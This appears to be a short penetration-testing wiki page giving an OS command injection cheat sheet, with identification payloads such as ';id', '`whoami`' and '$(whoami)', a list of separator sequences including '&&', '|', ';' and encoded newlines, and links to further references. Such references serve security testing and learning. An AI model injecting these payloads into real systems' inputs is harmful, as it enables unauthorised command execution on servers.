OS Command Injection

cheat sheet

Identification

;id
;id;
;id|
|id
| ls /
& whoami
`whoami`
$(whoami)

Initial sequence

Follow the initial sequence by your OS command payload

&
&&
|
||
;
"
";
'"
';
%0a
%0d%0a
\0
\n
\r
*;

References

https://portswigger.net/web-security/os-command-injection

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection

PreviousPath TraversalNextOpen Redirect

Last updated